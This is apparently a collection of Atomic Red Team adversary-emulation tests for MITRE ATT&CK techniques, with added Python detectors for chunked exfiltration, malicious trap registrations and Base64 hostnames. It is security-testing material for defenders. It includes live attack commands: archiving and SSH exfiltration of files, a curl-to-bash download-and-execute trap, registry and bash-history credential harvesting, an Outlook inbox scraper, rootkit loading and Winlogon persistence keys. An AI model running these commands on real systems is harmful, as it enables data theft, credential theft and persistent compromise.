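    A series is flagged when it has at least `min_records` sends, the sizes
    and the gaps between sends are both nearly uniform, and the process sent
    at least `min_out_in_ratio` times more than it received.
    """
    series = defaultdict(list)
    for ts, pid, proc, dst, sent, received in sorted(flows):
        series[(pid, proc, dst)].append((ts, sent, received))
    findings = []
    for (pid, proc, dst), recs in series.items():
        if len(recs) < min_records:
            continue
        sizes = [r[1] for r in recs]
        intervals = [b[0] - a[0] for a, b in zip(recs, recs[1:])]
        size_cv, interval_cv = variation(sizes), variation(intervals)
        total_in = sum(r[2] for r in recs)
        ratio = sum(sizes) / total_in if total_in else float("inf")
        if (size_cv is not None and size_cv <= max_size_cv
                and interval_cv is not None and interval_cv <= max_interval_cv
                and ratio >= min_out_in_ratio):
            findings.append({"pid": pid, "process": proc, "destination": dst,
                             "chunks": len(recs), "chunk_bytes": round(mean(sizes)),
                             "interval_s": round(mean(intervals), 1),
                             "out_in_ratio": round(ratio, 1)})
    return findings


if __name__ == "__main__":
    for f in find_chunked_transfers(SAMPLE_FLOWS):
        print(f"pid {f['pid']} ({f['process']}) -> {f['destination']}: "
              f"{f['chunks']} chunks of {f['chunk_bytes']} B every {f['interval_s']} s, "
              f"out/in ratio {f['out_in_ratio']}")
```

Lowering `min_out_in_ratio` to 1.0 also flags the heartbeat series, which is the false positive the ratio criterion is there to remove.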
--------------------------------------------------------------------------------
/tests/T1002/T1002.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1002
display_name: Data Compressed

atomic_tests:
- name: Compress Data for Exfiltration With PowerShell
  description: |
    TODO
  supported_platforms:
    - windows
  input_arguments:
    input_file:
      description: Path that should be compressed into our output file
      type: Path
      default: C:\*
    output_file:
      description: Path where resulting compressed data should be placed
      type: Path
      default: C:\test\Data.zip
  executor:
    name: powershell
    command: |
      dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}

- name: Compress Data for Exfiltration With Rar
  description: |
    TODO
  supported_platforms:
    - windows
  input_arguments:
    input_file:
      description: Path that should be compressed into our output file
      type: Path
      default: "*.docx"
    output_file:
      description: Path where resulting compressed data should be placed
      type: Path
      default: exfilthis.rar
  executor:
    name: command_prompt
    command: |
      rar a -r #{output_file} #{input_file}

- name: Data Compressed - nix
  description: |
    TODO
  supported_platforms:
    - linux
    - macos
  executor:
    name: sh
    command: |
      mkdir /tmp/victim-files
      cd /tmp/victim-files
      touch a b c d e f g
      echo "This file will be gzipped" > /tmp/victim-gzip.txt
      echo "This file will be tarred" > /tmp/victim-tar.txt
      zip /tmp/victim-files.zip /tmp/victim-files/*
      gzip -f /tmp/victim-gzip.txt
      tar -cvzf /tmp/victim-files.tar.gz /tmp/victim-files/
      tar -cvzf /tmp/victim-tar.tar.gz /tmp/victim-tar.txt
--------------------------------------------------------------------------------
/tests/T1048/T1048.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1048
display_name: Exfiltration Over Alternative Protocol
tactic: Exfiltration
description: Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.

atomic_tests:
- name: Exfiltration over alternative protocols
  description: |
    Input a domain and test Exfiltration over SSH

  supported_platforms:
    - macos
    - centos
    - ubuntu
    - linux

  input_arguments:
    domain:
      description: target SSH domain
      type: url
      default: target.example.com
    user_name:
      description: username for domain
      type: string
      default: atomic
    password:
      description: password for user
      type: string
      default: atomic

  executor_nix:
    name: sh
    command: |
      ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
      tar czpf - /Users/* | openssl des3 -salt -pass pass:#{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

  executor_man:
    name: manual
    steps: |
      1. Victim System Configuration:
         mkdir /tmp/victim-staging-area
         echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

      2. Using Python to establish a one-line HTTP server on victim system:
         cd /tmp/victim-staging-area
         python -m SimpleHTTPServer 1337

      3. To retrieve the data from an adversary system:
         wget http://VICTIM_IP:1337/victim-file.txt
--------------------------------------------------------------------------------
/tests/T1154/T1154.md:
--------------------------------------------------------------------------------
# T1154 - Trap
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1154)
The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. Adversaries can use this to register code to be executed when the shell encounters specific interrupts either to gain execution or as a persistence mechanism. Trap commands are of the following format: `trap 'command list' signals`, where "command list" will be executed when "signals" are received.

Detection: Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.

Platforms: Linux, macOS

Data Sources: File monitoring, Process Monitoring, Process command-line parameters

Permissions Required: User, Administrator

Remote Support: No

## Atomic Tests

- [Atomic Test #1 - Trap](#atomic-test-1---trap)

## Atomic Test #1 - Trap
After exiting the shell, the script will download and execute.

After sending a keyboard interrupt (CTRL+C) the script will download and execute.

**Supported Platforms:** macOS, CentOS, Ubuntu, Linux

#### Run it with `sh`!
```
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
exit
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
```
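A scanner for the "suspicious or overly broad trap commands" the detection paragraph says to look for in files, run over a constructed script that carries a normal cleanup trap and a download-and-execute trap shaped like the atomic test above. This is an added example written for this page, not Atomic Red Team code; the sample script, the signal list and the scoring rules are assumptions, and only single-line trap statements are parsed.

```python
"""Scanner for ATT&CK T1154 (Trap) registrations in shell files, written for this page.

Finds `trap 'command list' signals` statements in a script or shell rc file
and lists why each one deserves a look: a broad signal (EXIT, INT, DEBUG,
ERR), a command list that downloads content and pipes it into a shell,
detaching with nohup/setsid/&, or decoding an embedded payload. Single-line
trap statements only; the sample script is constructed for this example.
"""
import re
import shlex

BROAD_SIGNALS = {"EXIT", "INT", "DEBUG", "ERR", "RETURN", "0", "2"}
DOWNLOAD_TOOLS = ("curl", "wget", "fetch")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:sh|bash|zsh|ksh|dash)\b")
DETACH = re.compile(r"\bnohup\b|\bsetsid\b|[^&]&\s*$")
DECODE = re.compile(r"base64\s+(?:-d|--decode)|/dev/tcp/")
PUNCT = "();<>|&"   # shell punctuation that ends a trap statement

# Constructed sample: a benign cleanup trap and one shaped like the atomic test
SAMPLE_SCRIPT = r"""
#!/bin/bash
# constructed sample script for the scanner
TMP=$(mktemp -d)
trap 'rm -rf "$TMP"' EXIT
trap 'nohup curl -sS https://example.invalid/payload.sh | bash' INT
trap - TERM
trap '' HUP; echo done
"""


def _is_punct(tok):
    return bool(tok) and all(ch in PUNCT for ch in tok)


def _canonical(signal):
    """INT, SIGINT and sigint all compare as INT."""
    s = signal.upper()
    return s[3:] if s.startswith("SIG") else s


def parse_traps(script_text):
    """Yield (line_number, command_list, [signals]) for each trap registration."""
    for lineno, line in enumerate(script_text.splitlines(), 1):
        lexer = shlex.shlex(line, posix=True, punctuation_chars=True)
        lexer.whitespace_split = True   # split only on whitespace and PUNCT, honour quotes
        try:
            tokens = list(lexer)
        except ValueError:              # unbalanced quotes: not a single-line trap
            continue
        i = 0
        while i < len(tokens):
            if tokens[i] != "trap":
                i += 1
                continue
            args, i = [], i + 1
            while i < len(tokens) and not _is_punct(tokens[i]):
                args.append(tokens[i])
                i += 1
            # `trap -l`, `trap -p` and `trap - SIG` list or reset; they register nothing
            if args and not args[0].startswith("-"):
                yield lineno, args[0], args[1:]


def assess_trap(command, signals):
    """Return the reasons a registration looks suspicious (empty list if none)."""
    reasons = []
    broad = [s for s in signals if _canonical(s) in BROAD_SIGNALS]
    if broad:
        reasons.append("broad signal(s): " + ", ".join(broad))
    cmd = command.lower()
    if any(tool in cmd for tool in DOWNLOAD_TOOLS) and PIPE_TO_SHELL.search(cmd):
        reasons.append("downloads content and pipes it into a shell")
    if DETACH.search(cmd):
        reasons.append("detaches from the shell (nohup/setsid/&)")
    if DECODE.search(cmd):
        reasons.append("decodes an embedded payload or opens a raw socket")
    return reasons


def scan_script(script_text):
    """Every trap registration in the text, each with its assessment."""
    return [{"line": n, "command": c, "signals": s, "reasons": assess_trap(c, s)}
            for n, c, s in parse_traps(script_text)]


def suspicious_traps(script_text, min_reasons=2):
    """Registrations with at least `min_reasons` findings; a lone cleanup trap on EXIT passes."""
    return [t for t in scan_script(script_text) if len(t["reasons"]) >= min_reasons]


if __name__ == "__main__":
    for t in suspicious_traps(SAMPLE_SCRIPT):
        print(f"line {t['line']}: trap on {' '.join(t['signals'])}: {'; '.join(t['reasons'])}")
```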
--------------------------------------------------------------------------------
/tests/T1090/T1090.md:
--------------------------------------------------------------------------------
# T1090 - Connection Proxy
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090)
A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)

The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.

The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.

## Atomic Tests

- [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy)

## Atomic Test #1 - Connection Proxy
Enable traffic redirection.

To undo changes made by this test:

    unset http_proxy
    unset https_proxy

Note that this test may conflict with pre-existing system configuration.

**Supported Platforms:** macOS, Linux

#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|

#### Run it with `sh`!
```
export #{proxy_scheme}_proxy=#{proxy_server}
```
--------------------------------------------------------------------------------
/tests/T1214/T1214.md:
--------------------------------------------------------------------------------
# T1214 - Credentials in Registry
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1214)
The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

Example commands to find Registry keys related to password information: (Citation: Pentestlab Stored Credentials)
* Local Machine Hive: `reg query HKLM /f password /t REG_SZ /s`
* Current User Hive: `reg query HKCU /f password /t REG_SZ /s`

Detection: Monitor processes for applications that can be used to query the Registry, such as Reg, and collect command parameters that may indicate credentials are being searched. Correlate activity with related suspicious behavior that may indicate an active intrusion to reduce false positives.

Platforms: Windows

Data Sources: Windows Registry, Process command-line parameters, Process Monitoring

Permissions Required: User, Administrator

System Requirements: Ability to query some Registry locations depends on the adversary's level of access. User permissions are usually limited to access of user-related Registry keys.

Contributors: Sudhanshu Chauhan, @Sudhanshu_C

## Atomic Tests

- [Atomic Test #1 - Enumeration for Credentials in Registry](#atomic-test-1---enumeration-for-credentials-in-registry)

## Atomic Test #1 - Enumeration for Credentials in Registry
Queries to enumerate for credentials in the Registry.

**Supported Platforms:** Windows

#### Run it with `command_prompt`!
```
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
```
40 | -------------------------------------------------------------------------------- /tests/T1152/T1152.md: -------------------------------------------------------------------------------- 1 | # T1152 - Launchctl 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1152) 3 |
Launchctl controls the macOS launchd process which handles things like launch agents and launch daemons, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input. By loading or reloading launch agents or launch daemons, adversaries can install persistence or execute changes they made (Citation: Sofacy Komplex Trojan). Running a command from launchctl is as simple as launchctl submit -l -- /Path/to/thing/to/execute "arg" "arg" "arg". Loading, unloading, or reloading launch agents or launch daemons can require elevated privileges. 4 | 5 | Adversaries can abuse this functionality to execute code or even bypass whitelisting if launchctl is an allowed process. 6 | 7 | Detection: Knock Knock can be used to detect persistent programs such as those installed via launchctl as launch agents or launch daemons. Additionally, every launch agent or launch daemon must have a corresponding plist file on disk somewhere which can be monitored. Monitor process execution from launchctl/launchd for unusual or unknown processes. 8 | 9 | Platforms: macOS 10 | 11 | Data Sources: File monitoring, Process Monitoring, Process command-line parameters 12 | 13 | Defense Bypassed: Application whitelisting, Process whitelisting, Whitelisting by file name or path 14 | 15 | Permissions Required: User, Administrator 16 | 17 | Remote Support: No
18 | 19 | ## Atomic Tests 20 | 21 | - [Atomic Test #1 - Launchctl](#atomic-test-1---launchctl) 22 | 23 | 24 |
25 | 26 | ## Atomic Test #1 - Launchctl 27 | Utilize launchctl 28 | 29 | **Supported Platforms:** macOS 30 | 31 | 32 | #### Run it with `sh`! 33 | ``` 34 | launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator 35 | ``` 36 |
--------------------------------------------------------------------------------
/tests/T1074/Discovery.bat:
--------------------------------------------------------------------------------
net user Administrator /domain
net Accounts
net localgroup administrators
net use
net share
net group "domain admins" /domain
net config workstation
net accounts
net accounts /domain
net view
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
wmic useraccount list
wmic useraccount get /ALL
wmic startup list brief
wmic share list
wmic service get name,displayname,pathname,startmode
wmic process list brief
wmic process get caption,executablepath,commandline
wmic qfe get description,installedOn /format:csv
arp -a
whoami
ipconfig /displaydns
route print
netsh advfirewall show allprofiles
systeminfo
qwinsta
quser
--------------------------------------------------------------------------------
/tests/T1139/T1139.md:
--------------------------------------------------------------------------------
# T1139 - Bash History
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1139)
Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user's .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user's last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

Detection: Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like "history" instead of commands like cat ~/.bash_history.

Platforms: Linux, macOS

Data Sources: File monitoring, Process monitoring, Process command-line parameters

Permissions Required: User

## Atomic Tests

- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)

## Atomic Test #1 - xxxx
xxxx

**Supported Platforms:** Linux, macOS

#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| bash_history_filename | Path of the bash history file to capture | Path | ~/.bash_history|
| bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|

#### Run it with `sh`!
```
cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
```
--------------------------------------------------------------------------------
/tests/T1050/T1050.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1050
display_name: Service Installation
tactic: Persistence, Privilege Escalation
description: When operating systems boot up, they can start programs or applications called services that perform background system functions. Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution. **Requires Admin**

atomic_tests:
- name: Service Installation
  description: |
    Installs A Local Service
    Installs A Local Service via PowerShell

  supported_platforms:
    - windows

  input_arguments:
    binary_path:
      description: Name of the service binary, include path.
      type: Path
      default: \mate\tests\T1050\bin\AtomicService.exe
    service_name:
      description: Name of the Service
      type: String
      default: AtomicTestService

  executor_cmd:
    name: command_prompt
    command: |
      sc.exe create #{service_name} binPath= "#{binary_path}"
      sc.exe start #{service_name}
      sc.exe stop #{service_name}
      sc.exe delete #{service_name}

  executor_pwr:
    name: powershell
    command: |
      New-Service -Name #{service_name} -BinaryPathName "#{binary_path}"
      Start-Service -Name #{service_name}
      Stop-Service -Name #{service_name}
      (Get-WmiObject Win32_Service -filter "name='#{service_name}'").Delete()
--------------------------------------------------------------------------------
/tests/T1007/T1007.md:
--------------------------------------------------------------------------------
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1007)
Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well.

Detection: System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

Monitor processes and command-line arguments for actions that could be taken to gather system information related to services. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.

Platforms: Windows

Data Sources: Process command-line parameters, Process monitoring

Permissions Required: User, Administrator, SYSTEM

## Atomic Tests

- [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)

## Atomic Test #1 - System Service Discovery
Identify system services

**Supported Platforms:** Windows

#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | Name of service to start, stop, query | string | svchost.exe|

#### Run it with `command_prompt`!
```
tasklist.exe
sc query
sc query state= all
sc start #{service_name}
sc stop #{service_name}
wmic service where (displayname like "#{service_name}") get name
```
43 | -------------------------------------------------------------------------------- /tests/T1114/Get-Inbox.ps1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | 4 | Scrapes message data from the inbox of the current user and stores data in 'mail.csv' in the directory where the scrip was executed 5 | 6 | Outlook Email Collection 7 | MITRE ATT&CK - T1114 8 | Author: Greg Foss (@heinzarelli) 9 | Date: February, 2019 10 | License: BSD 3-Clause 11 | 12 | .EXAMPLE 13 | 14 | Display email contents in the terminal 15 | PS C:\> .\Get-Inbox.ps1 16 | 17 | Write emails out to a CSV 18 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv" 19 | #> 20 | 21 | [CmdLetBinding()] 22 | param( [string]$file ) 23 | 24 | function Kill-Outlook { 25 | 26 | # Check to see if outlook is running, and close it to scrape mail data programmatically 27 | $outlook = Get-Process -Name Outlook -ErrorAction SilentlyContinue 28 | if ($outlook) { 29 | $outlook.CloseMainWindow() 30 | Sleep 5 31 | if (!$outlook.HasExited) { 32 | $outlook | Stop-Process -Force > $null 33 | } 34 | } 35 | Remove-Variable outlook > $null 36 | } 37 | 38 | function Scrape-Outlook { 39 | 40 | # Connect to the local outlook inbox and read mail 41 | Add-type -assembly "Microsoft.Office.Interop.Outlook" | out-null 42 | $olFolders = "Microsoft.Office.Interop.Outlook.olDefaultFolders" -as [type] 43 | $inbox = new-object -comobject outlook.application 44 | $namespace = $inbox.GetNameSpace("MAPI") 45 | $folder = $namespace.getDefaultFolder($olFolders::olFolderInBox) 46 | Write-Output "Please be patient, this may take some time..." 
47 | 48 | # Output the data 49 | if ( $file ) { 50 | $folder.items | 51 | Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName, Body | 52 | Export-Csv -Path $file 53 | } else { 54 | $folder.items | 55 | Select-Object -Property Subject, ReceivedTime, SenderName, ReceivedByName 56 | } 57 | } 58 | 59 | Kill-Outlook > $null 60 | Scrape-Outlook 61 | Kill-Outlook > $null -------------------------------------------------------------------------------- /tests/T1014/T1014.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1014 3 | display_name: Loadable Kernel Module based Rootkit 4 | 5 | atomic_tests: 6 | - name: Loadable Kernel Module based Rootkit 7 | description: | 8 | Loadable Kernel Module based Rootkit 9 | 10 | supported_platforms: 11 | - linux 12 | 13 | input_arguments: 14 | rootkit_file: 15 | description: Path To Module 16 | type: String 17 | default: Module.ko 18 | 19 | executor: 20 | name: sh 21 | command: | 22 | sudo insmod #{rootkit_file} 23 | - name: Loadable Kernel Module based Rootkit 24 | description: | 25 | Loadable Kernel Module based Rootkit 26 | 27 | supported_platforms: 28 | - linux 29 | 30 | input_arguments: 31 | rootkit_file: 32 | description: Path To Module 33 | type: String 34 | default: Module.ko 35 | 36 | executor: 37 | name: sh 38 | command: | 39 | sudo modprobe #{rootkit_file} 40 | - name: LD_PRELOAD based Rootkit 41 | description: | 42 | LD_PRELOAD based Rootkit 43 | 44 | supported_platforms: 45 | - linux 46 | 47 | executor: 48 | name: sh 49 | command: | 50 | export LD_PRELOAD=$PWD/#{rootkit_file} 51 | 52 | - name: Windows Signed Driver Rootkit Test 53 | description: | 54 | This test exploits a signed driver to execute code in Kernel. 
55 | SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7 56 | We leverage the work done here: 57 | https://zerosum0x0.blogspot.com/2017/07/puppet-strings-dirty-secret-for-free.html 58 | The hash of our PoC Exploit is 59 | SHA1 DD8DA630C00953B6D5182AA66AF999B1E117F441 60 | This will simulate hiding a process. 61 | It would be wise if you only run this in a test environment 62 | 63 | supported_platforms: 64 | - windows 65 | 66 | input_arguments: 67 | driver_path: 68 | description: Path to the vulnerable driver 69 | type: Path 70 | default: C:\Drivers\driver.sys 71 | 72 | executor: 73 | name: command_prompt 74 | command: | 75 | puppetstrings #{driver_path} 76 | -------------------------------------------------------------------------------- /tests/T1132/T1132.md: -------------------------------------------------------------------------------- 1 | # T1132 - Data Encoding 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1132) 3 |
Command and control (C2) information is encoded using a standard data encoding system. Use of data encoding may be to adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, UTF-8, or other binary-to-text and character encoding systems. (Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip. 4 | 5 | Detection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) 6 | 7 | Platforms: Linux, macOS, Windows 8 | 9 | Data Sources: Packet capture, Process use of network, Process Monitoring, Network protocol analysis 10 | 11 | Permissions Required: User 12 | 13 | Requires Network: Yes 14 | 15 | Contributors: Itzik Kotler, SafeBreach
16 | 17 | ## Atomic Tests 18 | 19 | - [Atomic Test #1 - Base64 Encoded data.](#atomic-test-1---base64-encoded-data) 20 | 21 | 22 |
23 | 24 | ## Atomic Test #1 - Base64 Encoded data. 25 | Utilizing a common technique for posting base64 encoded data. 26 | 27 | **Supported Platforms:** macOS, Linux 28 | 29 | 30 | #### Inputs 31 | | Name | Description | Type | Default Value | 32 | |------|-------------|------|---------------| 33 | | destination_url | Destination URL to post encoded data. | string | redcanary.com| 34 | | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=| 35 | 36 | #### Run it with `sh`! 37 | ``` 38 | echo -n 111-11-1111 | base64 39 | curl -XPOST #{base64_data}.#{destination_url} 40 | ``` 41 |
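A defender-side check for the pattern this test exercises, Base64 data carried as a hostname label, written as an added Python example that is not part of the Atomic Red Team repository. The host names are constructed sample log entries; the first is the test's own `MTExLTExLTExMTE=.redcanary.com`, and the length and alphabet thresholds are assumptions chosen to keep ordinary labels out of the results.

```python
"""Detection helper for T1132-style Base64 data smuggled into hostnames.

Added example, not part of the Atomic Red Team repository. It takes
constructed proxy/DNS log lines (one host name per entry), splits each host
into labels, and flags labels that decode as strict Base64 into printable text.
"""
import base64
import binascii
import re
import string

# Strict Base64 alphabet with optional padding; strict decoding also requires
# the length to be a multiple of four.
_B64_LABEL = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
_PRINTABLE = set(string.printable) - set("\x0b\x0c")
_MIN_LABEL_LEN = 8  # assumed threshold: shorter labels are too often real words

# Constructed sample: host names as a proxy or DNS log would record them.
# The first entry is the page's own test input (Base64 of "111-11-1111").
SAMPLE_HOSTS = [
    "MTExLTExLTExMTE=.redcanary.com",
    "www.example.com",
    "cdn.static.example.org",
    "dGVzdC1kYXRhLWV4Zmls.updates.example.net",  # Base64 of "test-data-exfil"
    "abcd.example.com",                          # too short to be considered
]


def decode_label(label: str):
    """Return the decoded text if `label` is strict Base64 of printable ASCII, else None."""
    if len(label) < _MIN_LABEL_LEN or len(label) % 4 != 0 or not _B64_LABEL.match(label):
        return None
    try:
        raw = base64.b64decode(label, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or any(ch not in _PRINTABLE for ch in text):
        return None
    return text


def find_encoded_labels(hosts):
    """Return (host, label, decoded) for every label that looks like smuggled Base64."""
    findings = []
    for host in hosts:
        for label in host.rstrip(".").split("."):
            decoded = decode_label(label)
            if decoded is not None:
                findings.append((host, label, decoded))
    return findings


if __name__ == "__main__":
    for host, label, decoded in find_encoded_labels(SAMPLE_HOSTS):
        print(f"{host}: label {label!r} decodes to {decoded!r}")
```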
42 | -------------------------------------------------------------------------------- /tests/T1004/T1004.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1004 3 | display_name: Winlogon Helper DLL 4 | 5 | atomic_tests: 6 | - name: Winlogon Shell Key Persistence - PowerShell 7 | description: | 8 | PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | binary_to_execute: 15 | description: Path of binary to execute 16 | type: Path 17 | default: C:\Windows\System32\cmd.exe 18 | 19 | executor: 20 | name: powershell 21 | command: | 22 | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force 23 | 24 | - name: Winlogon Userinit Key Persistence - PowerShell 25 | description: | 26 | PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. 27 | 28 | supported_platforms: 29 | - windows 30 | 31 | input_arguments: 32 | binary_to_execute: 33 | description: Path of binary to execute 34 | type: Path 35 | default: C:\Windows\System32\cmd.exe 36 | 37 | executor: 38 | name: powershell 39 | command: | 40 | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force 41 | 42 | - name: Winlogon Notify Key Logon Persistence - PowerShell 43 | description: | 44 | PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. 
45 | 46 | supported_platforms: 47 | - windows 48 | 49 | input_arguments: 50 | binary_to_execute: 51 | description: Path of notification package to execute 52 | type: Path 53 | default: C:\Windows\Temp\atomicNotificationPackage.dll 54 | 55 | executor: 56 | name: powershell 57 | command: | 58 | New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force 59 | Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force -------------------------------------------------------------------------------- /tests/T1142/T1142.md: -------------------------------------------------------------------------------- 1 | # T1142 - Keychain 2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1142) 3 |
Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials. 4 | 5 | To manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials. 6 | 7 | Detection: Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it. 8 | 9 | Platforms: macOS 10 | 11 | Data Sources: System calls, Process Monitoring 12 | 13 | Permissions Required: Administrator
14 | 15 | ## Atomic Tests 16 | 17 | - [Atomic Test #1 - Keychain](#atomic-test-1---keychain) 18 | 19 | 20 |
